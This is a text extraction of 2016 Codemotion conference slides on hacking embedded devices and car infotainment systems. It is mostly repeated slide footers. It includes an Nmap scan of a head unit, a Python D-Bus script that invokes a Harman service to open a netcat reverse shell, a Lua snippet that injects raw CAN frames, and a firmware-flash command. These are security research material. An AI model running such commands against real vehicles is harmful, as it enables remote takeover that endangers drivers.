Embed Size (px)
Citation preview
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
WEARABLE BOTNETS AND HAPPY HACKED DRIVERS
Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
R8C/25 Group
64 KB Flash memory
3 KB RAM
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
NC30 standard library statically linked
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
http://deadhacker.com/2010/02/03/jtag-enumeration/
http://openocd.org/doc/html/Debug-Adapter-Hardware.html
https://github.com/synthetos/PiOCD/wiki/Using-a-Raspberry-Pi-as-a-JTAG-Dongle
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
http://www.dataman.com
E8a (R0E00008AKCE00)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
http://www.limpkin.fr/index.php?post/2012/04/30/Hacking-a-laundry-machine-in-one-day-%28SLE4442%29
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Multiple Bus (max 1Mbps)
UART or I2C (19.2Kbaud)
High Speed and Reliable (10Mbps)
Optical fiber (150Mbps)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
SAE J1979
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT
Nmap scan report for 192.168.5.1
Host is up (0.0036s latency).
PORT STATE SERVICE
2011/tcp open raid-cc
2021/tcp open servexec
4400/tcp open unknown
6010/tcp open x11
6020/tcp open unknown
6667/tcp open irc
51500/tcp open unknown
65200/tcp open unknown
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
https://www.freedesktop.org/wiki/Software/dbus/
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
#!python
import dbus
bus_obj = dbus.bus.BusConnection("tcp:host=192.168.5.1, port=6667")
proxy_object = bus_obj.get_object(
'com.harman.service.NavTrailService',
'/com/harman/service/NavTrailService')
playerengine_iface = dbus.Interface(
proxy_object, dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke(
'execute',
'{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
21.0.0.0/8
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
21.0.0.0/8
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
21.0.0.0/8
21.0.0.0/8
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
iocupdate -c 4 -p usr/share/V850/cmcioc.bin
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
SCLK
MOSI
MISO
SS
SCLK
MOSI
MISO
SS
ipc = require("ipc")
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
-- f0,02,39|91,LEN,CAN1,CAN2,CAN3,CAN4,DATA0,DATA1...
g:write(0xf0, 0x02, 91, 0x08, 0xf1, 0x86, 0xda, 0xf8,
0x05, 0x2F, 0x51, 0x06, 0x03, 0x10, 0x00, 0x00)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
MILAN 25-26.11.2016 www.codemotionworld.com
Andrea Pompili
[email protected] – Xilogic Corp.
Domande? Italian
مطالب أيةArabic
¿Preguntas? Spanish
Questions? English
tupoQghachmey Klingon
Sindarin
Japanese
Ερωτήσεις? Greek
вопросы? Russian
![Alexis POMPILI ( University & I.N.F.N. of Bari ) [ Collaboration]](https://img.pdfslide.net/doc/110x75/56813abf550346895da2cb65/alexis-pompili-university-infn-of-bari-collaboration.jpg)
